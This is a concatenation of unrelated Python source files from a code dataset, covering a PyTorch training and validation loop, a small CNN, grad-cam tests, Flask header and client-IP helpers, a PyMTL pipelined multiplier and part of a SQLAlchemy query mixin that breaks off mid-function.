last_batch = batch_idx == last_idx
data_time_m.update(time.time() - end)
if not args.prefetcher:
input, target = input.cuda(), target.cuda()
if mixup_fn is not None:
input, target = mixup_fn(input, target)
if args.channels_last:
input = input.contiguous(memory_format=torch.channels_last)
with amp_autocast():
output = model(input)
loss = loss_fn(output, target)
if not args.distributed:
losses_m.update(loss.item(), input.size(0))
optimizer.zero_grad()
if loss_scaler is not None:
loss_scaler(
loss, optimizer,
clip_grad=args.clip_grad, clip_mode=args.clip_mode,
parameters=model_parameters(model, exclude_head='agc' in args.clip_mode),
create_graph=second_order)
else:
loss.backward(create_graph=second_order)
if args.clip_grad is not None:
dispatch_clip_grad(
model_parameters(model, exclude_head='agc' in args.clip_mode),
value=args.clip_grad, mode=args.clip_mode)
optimizer.step()
if model_ema is not None:
model_ema.update(model)
torch.cuda.synchronize()
num_updates += 1
batch_time_m.update(time.time() - end)
if last_batch or batch_idx % args.log_interval == 0:
lrl = [param_group['lr'] for param_group in optimizer.param_groups]
lr = sum(lrl) / len(lrl)
if args.distributed:
reduced_loss = reduce_tensor(loss.data, args.world_size)
losses_m.update(reduced_loss.item(), input.size(0))
if args.local_rank == 0:
_logger.info(
'Train: {} [{:>4d}/{} ({:>3.0f}%)] '
'Loss: {loss.val:#.4g} ({loss.avg:#.3g}) '
'Time: {batch_time.val:.3f}s, {rate:>7.2f}/s '
'({batch_time.avg:.3f}s, {rate_avg:>7.2f}/s) '
'LR: {lr:.3e} '
'Data: {data_time.val:.3f} ({data_time.avg:.3f})'.format(
epoch,
batch_idx, len(loader),
100. * batch_idx / last_idx,
loss=losses_m,
batch_time=batch_time_m,
rate=input.size(0) * args.world_size / batch_time_m.val,
rate_avg=input.size(0) * args.world_size / batch_time_m.avg,
lr=lr,
data_time=data_time_m))
if args.save_images and output_dir:
torchvision.utils.save_image(
input,
os.path.join(output_dir, 'train-batch-%d.jpg' % batch_idx),
padding=0,
normalize=True)
if saver is not None and args.recovery_interval and (
last_batch or (batch_idx + 1) % args.recovery_interval == 0):
saver.save_recovery(epoch, batch_idx=batch_idx)
if lr_scheduler is not None:
lr_scheduler.step_update(num_updates=num_updates, metric=losses_m.avg)
end = time.time()
# end for
if hasattr(optimizer, 'sync_lookahead'):
optimizer.sync_lookahead()
return OrderedDict([('loss', losses_m.avg)])
def validate(model, loader, loss_fn, args, amp_autocast=suppress, log_suffix=''):
batch_time_m = AverageMeter()
losses_m = AverageMeter()
top1_m = AverageMeter()
top5_m = AverageMeter()
model.eval()
end = time.time()
last_idx = len(loader) - 1
with torch.no_grad():
for batch_idx, (input, target) in enumerate(loader):
last_batch = batch_idx == last_idx
if not args.prefetcher:
input = input.cuda()
target = target.cuda()
if args.channels_last:
input = input.contiguous(memory_format=torch.channels_last)
with amp_autocast():
output = model(input)
if isinstance(output, (tuple, list)):
output = output[0]
# augmentation reduction
reduce_factor = args.tta
if reduce_factor > 1:
output = output.unfold(0, reduce_factor, reduce_factor).mean(dim=2)
target = target[0:target.size(0):reduce_factor]
loss = loss_fn(output, target)
acc1, acc5 = accuracy(output, target, topk=(1, 5))
if args.distributed:
reduced_loss = reduce_tensor(loss.data, args.world_size)
acc1 = reduce_tensor(acc1, args.world_size)
acc5 = reduce_tensor(acc5, args.world_size)
else:
reduced_loss = loss.data
torch.cuda.synchronize()
losses_m.update(reduced_loss.item(), input.size(0))
top1_m.update(acc1.item(), output.size(0))
top5_m.update(acc5.item(), output.size(0))
batch_time_m.update(time.time() - end)
end = time.time()
if args.local_rank == 0 and (last_batch or batch_idx % args.log_interval == 0):
log_name = 'Test' + log_suffix
_logger.info(
'{0}: [{1:>4d}/{2}] '
'Time: {batch_time.val:.3f} ({batch_time.avg:.3f}) '
'Loss: {loss.val:>7.4f} ({loss.avg:>6.4f}) '
'Acc@1: {top1.val:>7.4f} ({top1.avg:>7.4f}) '
'Acc@5: {top5.val:>7.4f} ({top5.avg:>7.4f})'.format(
log_name, batch_idx, last_idx, batch_time=batch_time_m,
loss=losses_m, top1=top1_m, top5=top5_m))
metrics = OrderedDict([('loss', losses_m.avg), ('top1', top1_m.avg), ('top5', top5_m.avg)])
return metrics
if __name__ == '__main__':
main()
| 49.03972 | 137 | 0.646005 |
acdf976efc269bbd1a3e23c332f4e3a77cb10b96 | 935 | py | Python | bayes_nn/model/model_definition.py | RobRomijnders/bayes_nn | f0052fd6610fb9bb00344b52745ca47bcc0cd453 | [
"MIT"
] | 29 | 2018-01-03T01:09:07.000Z | 2020-12-15T20:23:11.000Z | bayes_nn/model/model_definition.py | RobRomijnders/bayes_nn | f0052fd6610fb9bb00344b52745ca47bcc0cd453 | [
"MIT"
] | null | null | null | bayes_nn/model/model_definition.py | RobRomijnders/bayes_nn | f0052fd6610fb9bb00344b52745ca47bcc0cd453 | [
"MIT"
] | 7 | 2018-01-01T15:03:52.000Z | 2021-06-25T10:46:12.000Z | import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
from torch.autograd import Variable
from bayes_nn import conf
class Net(nn.Module):
"""
Define a simple neural net
"""
def __init__(self):
super(Net, self).__init__()
self.drop_prob = conf.drop_prob
self.conv1 = nn.Conv2d(1, conf.num_filters, kernel_size=5)
self.num_units = int((((28-5)+1)/2)**2*conf.num_filters)
self.fc1 = nn.Linear(self.num_units, conf.num_fc)
self.fc2 = nn.Linear(conf.num_fc, 10)
def forward(self, x):
x = F.relu(F.max_pool2d(self.conv1(x), 2))
x = x.view(-1, self.num_units)
x = F.dropout(x, training=self.training, p=self.drop_prob)
x = F.relu(self.fc1(x))
x = F.dropout(x, training=self.training, p=self.drop_prob)
x = self.fc2(x)
return F.log_softmax(x) | 32.241379 | 66 | 0.638503 |
acdf97d65252cf03cdac3be78a31f85dc06cb182 | 2,268 | py | Python | tests/test_run_all_models.py | bei2/pytorch-grad-cam | c7f4a6cc26638fc668738c81ca35908ed6b1845b | [
"MIT"
] | 4,595 | 2017-05-31T21:40:32.000Z | 2022-03-31T22:38:14.000Z | tests/test_run_all_models.py | xiaosen-wang/pytorch-grad-cam | 939c279c70ba0459c6eba301e9849eb2168ad873 | [
"MIT"
] | 190 | 2017-07-12T13:59:35.000Z | 2022-03-31T20:39:30.000Z | tests/test_run_all_models.py | xiaosen-wang/pytorch-grad-cam | 939c279c70ba0459c6eba301e9849eb2168ad873 | [
"MIT"
] | 965 | 2017-06-01T04:57:26.000Z | 2022-03-31T07:43:10.000Z | import pytest
import torchvision
import torch
import cv2
from pytorch_grad_cam import GradCAM, \
ScoreCAM, \
GradCAMPlusPlus, \
AblationCAM, \
XGradCAM, \
EigenCAM, \
EigenGradCAM, \
LayerCAM, \
FullGrad
from pytorch_grad_cam.utils.image import show_cam_on_image, \
preprocess_image
@pytest.fixture
def numpy_image():
return cv2.imread("examples/both.png")
@pytest.mark.parametrize("cnn_model,target_layer_names", [
(torchvision.models.resnet18, ["layer4[-1]", "layer4[-2]"]),
(torchvision.models.vgg11, ["features[-1]"])
])
@pytest.mark.parametrize("batch_size,width,height", [
(2, 32, 32),
(1, 32, 40)
])
@pytest.mark.parametrize("target_category", [
None,
100
])
@pytest.mark.parametrize("aug_smooth", [
False
])
@pytest.mark.parametrize("eigen_smooth", [
True,
False
])
@pytest.mark.parametrize("cam_method",
[ScoreCAM,
AblationCAM,
GradCAM,
ScoreCAM,
GradCAMPlusPlus,
XGradCAM,
EigenCAM,
EigenGradCAM,
LayerCAM,
FullGrad])
def test_all_cam_models_can_run(numpy_image, batch_size, width, height,
cnn_model, target_layer_names, cam_method,
target_category, aug_smooth, eigen_smooth):
img = cv2.resize(numpy_image, (width, height))
input_tensor = preprocess_image(img)
input_tensor = input_tensor.repeat(batch_size, 1, 1, 1)
model = cnn_model(pretrained=True)
target_layers = []
for layer in target_layer_names:
target_layers.append(eval(f"model.{layer}"))
cam = cam_method(model=model,
target_layers=target_layers,
use_cuda=False)
cam.batch_size = 4
grayscale_cam = cam(input_tensor=input_tensor,
target_category=target_category,
aug_smooth=aug_smooth,
eigen_smooth=eigen_smooth)
assert(grayscale_cam.shape[0] == input_tensor.shape[0])
assert(grayscale_cam.shape[1:] == input_tensor.shape[2:])
| 30.24 | 75 | 0.583774 |
acdf98a9c623604fa07d9cf49029e19210661f51 | 2,462 | py | Python | utils.py | alphagov/browser-listener | a073e0914aee72711a7f1d18fa3e8289c39095c9 | [
"MIT"
] | 1 | 2022-03-09T08:40:43.000Z | 2022-03-09T08:40:43.000Z | utils.py | alphagov/browser-listener | a073e0914aee72711a7f1d18fa3e8289c39095c9 | [
"MIT"
] | 5 | 2021-05-24T07:39:38.000Z | 2022-03-29T13:10:00.000Z | utils.py | alphagov/browser-listener | a073e0914aee72711a7f1d18fa3e8289c39095c9 | [
"MIT"
] | 2 | 2021-04-10T16:58:43.000Z | 2021-04-10T18:06:05.000Z | #!/usr/bin/env python3
import werkzeug.local
import flask.wrappers
def addHeaders(resp: flask.wrappers.Response) -> flask.wrappers.Response:
"""
Adds the no cache headers to a response
>>> from flask import Flask, make_response
>>> app = Flask(__name__)
>>> with app.app_context():
... blank_resp = make_response("OK")
>>> resp = addHeaders(blank_resp)
>>> for h in resp.headers:
... print(h)
('Content-Type', 'text/html; charset=utf-8')
('Content-Length', '2')
('X-Robots-Tag', 'noindex, nofollow, noimageindex')
('Cache-Control', 'public, max-age=0')
('Pragma', 'no-cache')
('Expires', '0')
"""
resp.headers["X-Robots-Tag"] = "noindex, nofollow, noimageindex"
resp.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
resp.headers["Pragma"] = "no-cache"
resp.headers["Expires"] = "0"
resp.headers["Cache-Control"] = "public, max-age=0"
return resp
def client_ip(request: werkzeug.local.LocalProxy) -> str:
"""
Gets the client IP address from a request
>>> from werkzeug.test import EnvironBuilder
>>> from werkzeug.wrappers import Request
>>> builder = EnvironBuilder(method='POST')
>>> env = builder.get_environ()
>>> req = Request(env)
>>> client_ip(req) is None
True
>>> builder = EnvironBuilder(method='POST',
... environ_overrides={'REMOTE_ADDR': '127.0.0.2'})
>>> env = builder.get_environ()
>>> req1 = Request(env)
>>> client_ip(req1)
'127.0.0.2'
>>> builder = EnvironBuilder(method='POST',
... environ_overrides={'HTTP_X_FORWARDED_FOR': '127.0.0.3, 127.0.0.2'})
>>> env = builder.get_environ()
>>> req2 = Request(env)
>>> client_ip(req2)
'127.0.0.3'
>>> builder = EnvironBuilder(method='POST',
... environ_overrides={'HTTP_X_FORWARDED_FOR': '::0, 127.0.0.2'})
>>> env = builder.get_environ()
>>> req3 = Request(env)
>>> client_ip(req3)
'::0'
"""
ips = None
if request.environ.get("HTTP_X_FORWARDED_FOR") is None:
ips = request.environ.get("REMOTE_ADDR")
else:
ips = request.environ["HTTP_X_FORWARDED_FOR"]
if ips:
if "," in ips:
return ips.split(",")[0].strip()
else:
return ips.strip()
if __name__ == "__main__":
"""
If this python is called directly, test using doctest
"""
import doctest
doctest.testmod()
| 25.381443 | 77 | 0.5987 |
acdf98b672bb4980205117e9615e951c00222e93 | 131 | py | Python | rocat/__init__.py | chongkong/rocat | 4a75682436954de2bdc65376f2a6a98f1962531e | [
"MIT"
] | 11 | 2017-08-15T16:46:27.000Z | 2021-12-29T23:03:51.000Z | rocat/__init__.py | chongkong/rocat | 4a75682436954de2bdc65376f2a6a98f1962531e | [
"MIT"
] | 2 | 2019-06-13T06:41:38.000Z | 2019-12-27T15:47:52.000Z | rocat/__init__.py | chongkong/rocat | 4a75682436954de2bdc65376f2a6a98f1962531e | [
"MIT"
] | 1 | 2019-12-27T14:40:46.000Z | 2019-12-27T14:40:46.000Z | from .finder import find
from .executor import ActorExecutor
from .globals import g
from .role import BaseActorRole, DictFieldRole
| 26.2 | 46 | 0.832061 |
acdf98d3a14246a732ee9edd9e1ff1461f4c8933 | 12,591 | py | Python | lizard/util/rtl/multiply.py | cornell-brg/lizard | 7f9a78a913e64b5cfdee3a26223539ad225bd6da | [
"BSD-3-Clause"
] | 50 | 2019-05-22T08:43:15.000Z | 2022-03-21T23:58:50.000Z | lizard/util/rtl/multiply.py | cornell-brg/lizard | 7f9a78a913e64b5cfdee3a26223539ad225bd6da | [
"BSD-3-Clause"
] | 1 | 2019-07-27T18:51:52.000Z | 2019-08-02T01:20:22.000Z | lizard/util/rtl/multiply.py | cornell-brg/lizard | 7f9a78a913e64b5cfdee3a26223539ad225bd6da | [
"BSD-3-Clause"
] | 11 | 2019-12-26T06:00:48.000Z | 2022-03-27T02:29:35.000Z | from pymtl import *
from lizard.bitutil import clog2
from lizard.util.rtl.method import MethodSpec
from lizard.util.rtl.interface import Interface, UseInterface
from lizard.util.rtl.register import Register, RegisterInterface
class MulPipelinedInterface(Interface):
def __init__(s, data_len, keep_upper=True):
s.DataLen = data_len
s.KeepUpper = keep_upper
super(MulPipelinedInterface, s).__init__([
MethodSpec(
'peek',
args=None,
rets={
'res': Bits(2 * s.DataLen if keep_upper else s.DataLen),
},
call=False,
rdy=True,
),
MethodSpec(
'take',
args=None,
call=True,
rdy=True,
),
MethodSpec(
'cl_helper_shift',
args=None,
rets=None,
call=False,
rdy=False,
),
MethodSpec(
'mult',
args={
'src1': Bits(s.DataLen),
'src2': Bits(s.DataLen),
'src1_signed': Bits(1),
'src2_signed': Bits(1),
},
rets=None,
call=True,
rdy=True,
),
])
class MulRetimedPipelined(Model):
def __init__(s, mul_interface, nstages):
UseInterface(s, mul_interface)
assert nstages > 0
m = s.interface.DataLen
n = 2 * m if s.interface.KeepUpper else m
s.valids_ = [
Register(RegisterInterface(1), reset_value=0) for _ in range(nstages)
]
s.vals_ = [
Register(RegisterInterface(n, enable=True)) for _ in range(nstages)
]
s.exec_ = [Wire(Bits(1)) for _ in range(nstages)]
s.rdy_ = [Wire(Bits(1)) for _ in range(nstages)]
s.value_ = Wire(2 * m)
# All the inputs get converted to unsigned
s.src1_usign_ = Wire(Bits(m))
s.src2_usign_ = Wire(Bits(m))
s.sign_in_ = Wire(1)
# Execute call
s.connect(s.mult_rdy, s.rdy_[0])
# Result call
s.connect(s.peek_rdy, s.valids_[nstages - 1].read_data)
s.connect(s.take_rdy, s.valids_[nstages - 1].read_data)
s.connect(s.peek_res, s.vals_[nstages - 1].read_data)
for i in range(nstages):
s.connect(s.vals_[i].write_call, s.exec_[i])
# HERE is the actual multiply that will be retimed
@s.combinational
def comb_mult():
s.value_.v = s.src1_usign_ * s.src2_usign_
@s.combinational
def unsign_srcs_in():
s.src1_usign_.v = 0
s.src2_usign_.v = 0
s.sign_in_.v = 0
s.sign_in_.v = (s.mult_src1_signed and s.mult_src1[m - 1]) ^ (
s.mult_src2_signed and s.mult_src2[m - 1])
s.src1_usign_.v = (~s.mult_src1 +
1) if (s.mult_src1[m - 1] and
s.mult_src1_signed) else s.mult_src1
s.src2_usign_.v = (~s.mult_src2 +
1) if (s.mult_src2[m - 1] and
s.mult_src2_signed) else s.mult_src2
@s.combinational
def set_rdy_last():
# Incoming call:
s.rdy_[nstages -
1].v = s.take_call or not s.valids_[nstages - 1].read_data
for i in range(nstages - 1):
@s.combinational
def set_rdy(i=i):
# A stage is ready to accept if it is invalid or next stage is ready
s.rdy_[i].v = not s.valids_[i].read_data or s.rdy_[i + 1]
@s.combinational
def set_exec_first():
s.exec_[0].v = s.rdy_[0] and s.mult_call
for i in range(1, nstages):
@s.combinational
def set_exec(i=i):
# Will execute if stage ready and current work is valid
s.exec_[i].v = s.rdy_[i] and s.valids_[i - 1].read_data
@s.combinational
def set_valids_last():
s.valids_[nstages - 1].write_data.v = (
not s.take_call and
s.valids_[nstages - 1].read_data) or s.exec_[nstages - 1]
for i in range(nstages - 1):
@s.combinational
def set_valids(i=i):
# Valid if blocked on next stage, or multuted this cycle
s.valids_[i].write_data.v = (not s.rdy_[i + 1] and
s.valids_[i].read_data) or s.exec_[i]
@s.combinational
def mult():
s.vals_[
0].write_data.v = ~s.value_[:n] + 1 if s.sign_in_ else s.value_[:n]
for i in range(1, nstages):
s.vals_[i].write_data.v = s.vals_[i - 1].read_data
class MulPipelined(Model):
def __init__(s, mul_interface, nstages, use_mul=True):
UseInterface(s, mul_interface)
# For now must be evenly divisible
assert nstages > 0
assert s.interface.DataLen % nstages == 0
m = s.interface.DataLen
n = 2 * m if s.interface.KeepUpper else m
k = s.interface.DataLen // nstages
last = nstages - 1
# All the inputs get converted to unsigned
s.src1_usign_ = Wire(Bits(m))
s.src2_usign_ = Wire(Bits(m))
# At step i, i = [0, nstages), product needs at most m + k(i+1) bits
s.valids_ = [
Register(RegisterInterface(1), reset_value=0) for _ in range(nstages)
]
if s.interface.KeepUpper:
s.vals_ = [
# nbits = m + k * (i + 1)
Register(RegisterInterface(2 * m, enable=True))
for i in range(nstages)
]
s.units_ = [
MulCombinational(
# input nbits = m,k, output = k+m
MulCombinationalInterface(m, k, 2 * m),
use_mul) for i in range(nstages)
]
s.src2_ = [
# nbits = m - k * i
Register(RegisterInterface(m, enable=True))
for i in range(nstages - 1)
]
else:
s.vals_ = [
Register(RegisterInterface(m, enable=True)) for _ in range(nstages)
]
s.units_ = [
MulCombinational(MulCombinationalInterface(m, k, m), use_mul)
for _ in range(nstages)
]
s.src2_ = [
Register(RegisterInterface(m, enable=True))
for _ in range(nstages - 1)
]
s.src1_ = [
Register(RegisterInterface(m, enable=True)) for _ in range(nstages - 1)
]
s.signs_ = [
Register(RegisterInterface(1, enable=True)) for _ in range(nstages - 1)
]
s.exec_ = [Wire(Bits(1)) for _ in range(nstages)]
s.rdy_ = [Wire(Bits(1)) for _ in range(nstages)]
s.sign_out_ = Wire(Bits(1))
s.sign_in_ = Wire(Bits(1))
# Connect the sign bit in the last stage
if nstages == 1:
s.connect_wire(s.sign_out_, s.sign_in_)
else:
s.connect(s.sign_out_, s.signs_[last - 1].read_data)
# Execute call rdy
s.connect(s.mult_rdy, s.rdy_[0])
# Result call rdy
s.connect(s.peek_rdy, s.valids_[last].read_data)
s.connect(s.take_rdy, s.valids_[last].read_data)
s.connect(s.peek_res, s.vals_[last].read_data)
for i in range(nstages):
s.connect(s.vals_[i].write_call, s.exec_[i])
s.connect(s.units_[i].mult_call, s.exec_[i])
# Last stage does not have these
if i < nstages - 1:
s.connect(s.src1_[i].write_call, s.exec_[i])
s.connect(s.src2_[i].write_call, s.exec_[i])
s.connect(s.signs_[i].write_call, s.exec_[i])
# Take twos compliment
@s.combinational
def unsign_srcs_in():
s.src1_usign_.v = 0
s.src2_usign_.v = 0
s.sign_in_.v = 0
s.sign_in_.v = (s.mult_src1_signed and s.mult_src1[m - 1]) ^ (
s.mult_src2_signed and s.mult_src2[m - 1])
s.src1_usign_.v = (~s.mult_src1 +
1) if (s.mult_src1[m - 1] and
s.mult_src1_signed) else s.mult_src1
s.src2_usign_.v = (~s.mult_src2 +
1) if (s.mult_src2[m - 1] and
s.mult_src2_signed) else s.mult_src2
@s.combinational
def connect_unit0():
s.units_[0].mult_src1.v = s.src1_usign_
s.units_[0].mult_src2.v = s.src2_usign_[:k]
for i in range(1, nstages):
@s.combinational
def connect_unitk(i=i):
s.units_[i].mult_src1.v = s.src1_[i - 1].read_data
s.units_[i].mult_src2.v = s.src2_[i - 1].read_data[:k]
@s.combinational
def set_rdy_last():
s.rdy_[last].v = s.take_call or not s.valids_[last].read_data
for i in range(nstages - 1):
@s.combinational
def set_rdy(i=i):
# A stage is ready to accept if it is invalid or next stage is ready
s.rdy_[i].v = not s.valids_[i].read_data or s.rdy_[i + 1]
@s.combinational
def set_exec_first():
s.exec_[0].v = s.rdy_[0] and s.mult_call
for i in range(1, nstages):
@s.combinational
def set_exec(i=i):
# Will execute if stage ready and current work is valid
s.exec_[i].v = s.rdy_[i] and s.valids_[i - 1].read_data
@s.combinational
def set_valids_last():
s.valids_[last].write_data.v = (
not s.take_call and s.valids_[last].read_data) or s.exec_[last]
for i in range(nstages - 1):
@s.combinational
def set_valids(i=i):
# Valid if blocked on next stage, or multuted this cycle
s.valids_[i].write_data.v = (not s.rdy_[i + 1] and
s.valids_[i].read_data) or s.exec_[i]
# Hook up the pipeline stages
if nstages == 1:
@s.combinational
def connect_stage():
s.vals_[0].write_data.v = ~s.units_[
0].mult_res + 1 if s.sign_out_ else s.units_[0].mult_res
else:
@s.combinational
def connect_first_stage():
s.vals_[0].write_data.v = s.units_[0].mult_res
s.src1_[0].write_data.v = s.src1_usign_
s.src2_[0].write_data.v = s.src2_usign_ >> k
s.signs_[0].write_data.v = s.sign_in_
for i in range(1, nstages - 1):
@s.combinational
def connect_stage(i=i):
s.vals_[i].write_data.v = s.vals_[i - 1].read_data + (
s.units_[i].mult_res << (k * i))
s.src1_[i].write_data.v = s.src1_[i - 1].read_data
s.src2_[i].write_data.v = s.src2_[i - 1].read_data >> k
s.signs_[i].write_data.v = s.signs_[i - 1].read_data
@s.combinational
def connect_last_stage():
if s.sign_out_:
s.vals_[last].write_data.v = ~(s.vals_[last - 1].read_data +
(s.units_[last].mult_res <<
(k * last))) + 1
else:
s.vals_[last].write_data.v = s.vals_[last - 1].read_data + (
s.units_[last].mult_res << (k * last))
class MulCombinationalInterface(Interface):
def __init__(s, multiplier_nbits, multiplicand_nbits, product_nbits):
s.MultiplierLen = multiplier_nbits
s.MultiplicandLen = multiplicand_nbits
s.ProductLen = product_nbits
super(MulCombinationalInterface, s).__init__([
MethodSpec(
'mult',
args={
'src1': Bits(s.MultiplierLen),
'src2': Bits(s.MultiplicandLen),
},
rets={
'res': Bits(s.ProductLen),
},
call=True,
rdy=False,
),
])
# Unsigned only!
class MulCombinational(Model):
def __init__(s, mul_interface, use_mul=True):
UseInterface(s, mul_interface)
assert s.interface.MultiplierLen >= s.interface.MultiplicandLen
plen = s.interface.ProductLen
res_len = s.interface.MultiplierLen + s.interface.MultiplicandLen
s.tmp_res = Wire(res_len)
if not use_mul:
s.src1_ = Wire(plen)
s.tmps_ = [Wire(res_len) for _ in range(s.interface.MultiplicandLen + 1)]
if plen >= s.interface.MultiplierLen:
@s.combinational
def src1_zext():
s.src1_.v = s.mult_src1
else:
@s.combinational
def src1_truncate():
s.src1_.v = s.mult_src1[:plen]
s.connect_wire(s.tmp_res, s.tmps_[s.interface.MultiplicandLen])
# PYMTL_BROKEN Direction is inferred wrong:
#s.connect_wire(s.tmps_[0], 0)
@s.combinational
def eval_base():
s.tmps_[0].v = 0
for i in range(1, s.interface.MultiplicandLen + 1):
@s.combinational
def eval(i=i):
s.tmps_[i].v = s.tmps_[i - 1]
if s.mult_src2[i - 1]:
s.tmps_[i].v = s.tmps_[i - 1] + (s.src1_ << (i - 1))
else:
@s.combinational
def eval():
s.tmp_res.v = (s.mult_src1 * s.mult_src2)
# Now we need to zext or truncate to productlen
if plen > res_len:
@s.combinational
def zext_prod():
s.mult_res.v = zext(s.tmp_res, plen)
else:
@s.combinational
def trunc_prod():
s.mult_res.v = s.tmp_res[:plen]
| 29.907363 | 79 | 0.57009 |
acdf98ebb44ec72f69d20197ec3e898656941dcb | 1,544 | py | Python | get_single_dns.py | liyongyue/dnsspider | ab29fb240c45bf16e146e96acff41aea29591f51 | [
"0BSD"
] | null | null | null | get_single_dns.py | liyongyue/dnsspider | ab29fb240c45bf16e146e96acff41aea29591f51 | [
"0BSD"
] | null | null | null | get_single_dns.py | liyongyue/dnsspider | ab29fb240c45bf16e146e96acff41aea29591f51 | [
"0BSD"
] | null | null | null | #coding=utf-8
import dns.resolver
import re
import time
import json
def find_domain(string):
domain_re=re.compile(r'(\S*?\.)+')
metch=domain_re.search(string)
if metch:
return metch.group()
else:
return ''
def resolve(domain):
global dqueue
global result
ns=[]
try :
answers=dns.resolver.query(domain,'NS')
for rdata in answers.rrset:
ad=str(rdata).lower()
flag=0
for d in dqueue:
if d==ad:
flag=1
break
if flag==0:
dqueue.append(ad)
ns.append(ad)
temp=[]
temp.append(domain)
temp.append(ns)
result.append(temp)
#print '+'+domain
except:
#print '-'+domain
return ''
def separate(domain):
global result
frag=domain.split('.')
for i in range(0,len(frag)-1):
f=0
f2=0
temp=''
for j in range(i,len(frag)-1):
temp=temp+frag[j]+'.'
for r in result:
if r[0]==temp:
f=1
break
for ns in r[1]:
if ns==temp:#此域名为一个权威服务器
f2=1
break
if f2==1:
continue
if f==0 and f2==0:
resolve(temp)
#print temp
if f==1:
break
class dependency():
def __init__(self,d,n):
self.domain=d
self.ns=n
def get_single_dns(target):
global dqueue
dqueue=[]
global result
result=[]
j=[]
if target[-1]!='.':
target=target+'.'
dqueue.append(target.lower())
while len(dqueue)!=0:
tempd=dqueue[0]
del dqueue[0]
separate(tempd)
#print dqueue
output=open(target+"json",'w')
for r in result:
d=dependency(r[0],r[1])
j.append(d.__dict__)
json_dependency=json.dumps(j)
output.write(json_dependency)
output.close()
return len(result)
| 17.747126 | 41 | 0.640544 |
acdf9a2f7575c849a4893a1dc6cee91e807da36d | 35,947 | py | Python | flask_sqlalchemy_booster/model_booster/queryable_mixin.py | inkmonk/flask-sqlalchemy-plus | c60cba605630a0a2dc43e3b7b23bdda572b11561 | [
"MIT"
] | 5 | 2015-12-30T09:08:47.000Z | 2018-04-20T09:12:23.000Z | flask_sqlalchemy_booster/model_booster/queryable_mixin.py | inkmonk/flask-sqlalchemy-plus | c60cba605630a0a2dc43e3b7b23bdda572b11561 | [
"MIT"
] | 12 | 2015-06-20T09:58:37.000Z | 2017-02-23T14:38:02.000Z | flask_sqlalchemy_booster/model_booster/queryable_mixin.py | inkmonk/flask-sqlalchemy-plus | c60cba605630a0a2dc43e3b7b23bdda572b11561 | [
"MIT"
] | 2 | 2020-04-12T15:05:05.000Z | 2021-08-11T04:11:14.000Z | # from sqlalchemy import func
from __future__ import absolute_import
from toolspy import subdict, remove_and_mark_duplicate_dicts, merge
from sqlalchemy.ext.associationproxy import AssociationProxyInstance
from sqlalchemy.ext.orderinglist import OrderingList
from sqlalchemy.orm import class_mapper
from sqlalchemy.sql.schema import UniqueConstraint
import six
from six.moves import range
from ..utils import cast_as_column_type
class QueryableMixin(object):
"""Contains all querying methods. Used for common ORM operations
Attributes:
_no_overwrite_(list): The list of attributes that should not be overwritten.
"""
_no_overwrite_ = []
_prevent_primary_key_initialization_ = True
_prevent_primary_key_updation_ = True
_fields_forbidden_from_being_set_ = None
allow_updation_based_on_unique_keys = False
@classmethod
def is_a_to_many_rel(cls, attr):
return attr in cls.__mapper__.relationships and cls.__mapper__.relationships[attr].uselist
@classmethod
def is_a_to_one_rel(cls, attr):
return attr in cls.__mapper__.relationships and not cls.__mapper__.relationships[attr].uselist
@classmethod
def columns(cls):
return [c for c in class_mapper(cls).columns]
@classmethod
def unique_columns(cls):
return [c for c in cls.columns() if c.unique]
@classmethod
def unique_column_names(cls):
return [c.key for c in cls.unique_columns()]
@classmethod
def table(cls):
return cls.__table__
@classmethod
def constraints(cls):
return cls.table().constraints
@classmethod
def unique_constraints(cls):
return [
c for c in cls.constraints()
if isinstance(c, UniqueConstraint)]
@classmethod
def unique_constraint_col_name_tuples(cls):
return [c.columns.keys() for c in cls.unique_constraints()]
@classmethod
def primary_key_name(cls):
return cls.__mapper__.primary_key[0].key
@classmethod
def primary_key(cls):
return getattr(cls, cls.primary_key_name())
def primary_key_value(self):
return getattr(self, self.primary_key().name)
@classmethod
def column_names(cls):
return list(cls.__mapper__.columns.keys())
@classmethod
def is_the_primary_key(cls, attr):
return attr == cls.primary_key_name()
@classmethod
def mapped_rel_class(cls, attr):
mapped_rel = next(
r for r in cls.__mapper__.relationships
if r.key == attr)
return mapped_rel.mapper.class_
def update_without_commit(self, **kwargs):
cls = type(self)
kwargs = cls.pre_save_adapter(kwargs, existing_instance=self)
kwargs = self._prepare_data_for_saving(kwargs)
for key, value in six.iteritems(kwargs):
if key not in cls.all_settable_keys():
continue
if not hasattr(cls, key) or isinstance(getattr(cls, key), property):
continue
if key not in self._no_overwrite_:
try:
setattr(self, key, value)
except Exception as e:
print(key, value, e.message)
raise
if isinstance(getattr(self, key), OrderingList):
getattr(self, key).reorder()
elif isinstance(getattr(cls, key), AssociationProxyInstance):
target_name = getattr(cls, key).target_collection
target_rel = getattr(self, target_name)
if isinstance(target_rel, OrderingList):
target_rel.reorder()
return self
def commit(self):
"""Commits a transaction.
"""
self.session.commit()
def save(self):
"""Saves a model instance to db.
Examples:
>>> customer = Customer.new(name="hari")
>>> customer.save()
"""
self.session.add(self)
self.session.commit()
def delete(self, commit=True):
"""Deletes a model instance.
Examples:
>>> customer.delete()
"""
self.session.delete(self)
if commit:
self.session.commit()
def _isinstance(self, model, raise_error=True):
"""Checks if the specified model instance matches the class model.
By default this method will raise a `ValueError` if the model is not of
expected type.
Args:
model (Model) : The instance to be type checked
raise_error (bool) : Flag to specify whether to raise error on
type check failure
Raises:
ValueError: If `model` is not an instance of the respective Model
class
"""
rv = isinstance(model, self.__model__)
if not rv and raise_error:
raise ValueError('%s is not of type %s' % (model, self.__model__))
return rv
@classmethod
def rollback_session(cls):
cls.session.rollback()
@classmethod
def _prepare_data_for_saving(cls, kwargs):
"""Returns a preprocessed dictionary of parameters.
Use this to filter the kwargs passed to `new`, `create`,
`build` methods.
Args:
**kwargs: a dictionary of parameters
"""
# kwargs.pop('csrf_token', None)
attrs_to_delete = []
for attr, val in kwargs.items():
if cls.is_the_primary_key(attr) and cls._prevent_primary_key_initialization_:
attrs_to_delete.append(attr)
# del kwargs[attr]
continue
if val == "":
# Making an assumption that there is no good usecase
# for setting an empty string. This will help prevent
# cases where empty string is sent because of client
# not clearing form fields to null
kwargs[attr] = None
continue
if attr in class_mapper(cls).relationships and attr not in cls._no_overwrite_:
rel = class_mapper(cls).relationships[attr]
if rel.uselist:
if isinstance(val, list):
if all(isinstance(v, dict) for v in val):
rel_cls = cls.mapped_rel_class(attr)
